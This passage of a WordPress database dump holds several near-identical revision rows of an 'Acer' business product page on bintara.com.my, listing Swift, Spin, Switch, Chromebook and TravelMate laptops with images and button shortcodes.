/>\r\n\r\n<strong><b>Switch 12</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:18:17','2019-09-18 06:18:17','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3129,1,'2019-09-18 14:19:40','2019-09-18 06:19:40','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Swift 7 Pro</b></strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr align=\"center\">\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Switch 12</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:19:40','2019-09-18 06:19:40','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3130,1,'2019-09-18 14:20:04','2019-09-18 06:20:04','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Swift 7 Pro</b></strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr align=\"center\">\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Switch 12</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:20:04','2019-09-18 06:20:04','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3131,1,'2019-09-18 14:20:45','2019-09-18 06:20:45','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Swift 7 Pro</b></strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr align=\"center\">\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Switch 12</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h3 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:20:45','2019-09-18 06:20:45','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3132,1,'2019-09-18 14:22:14','2019-09-18 06:22:14','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Swift 7 Pro</b></strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr align=\"center\">\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" 